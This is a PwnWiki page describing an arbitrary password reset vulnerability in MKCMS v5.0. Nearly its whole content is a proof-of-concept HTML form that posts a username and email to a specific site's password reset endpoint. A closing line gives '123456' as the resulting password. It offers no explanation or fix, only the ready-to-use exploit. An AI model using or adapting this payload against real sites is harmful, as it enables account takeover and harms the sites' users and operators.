MKCMS v5.0 任意密码重置漏洞

From PwnWiki
Revision as of 14:43, 10 July 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://v.micool.top/ucenter/repass.php" method="POST"> <input type="hid...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://v.micool.top/ucenter/repass.php" method="POST">
      <input type="hidden" name="u_name" value="lduo123" />
      <input type="hidden" name="u_email" value="[email protected]" />
      <input type="submit" value="Submit request" />
    </form>                         
  </body>
</html>

password:123456

Retrieved from "https://pwnwiki.com/index.php?title=MKCMS_v5.0_任意密码重置漏洞&oldid=6633"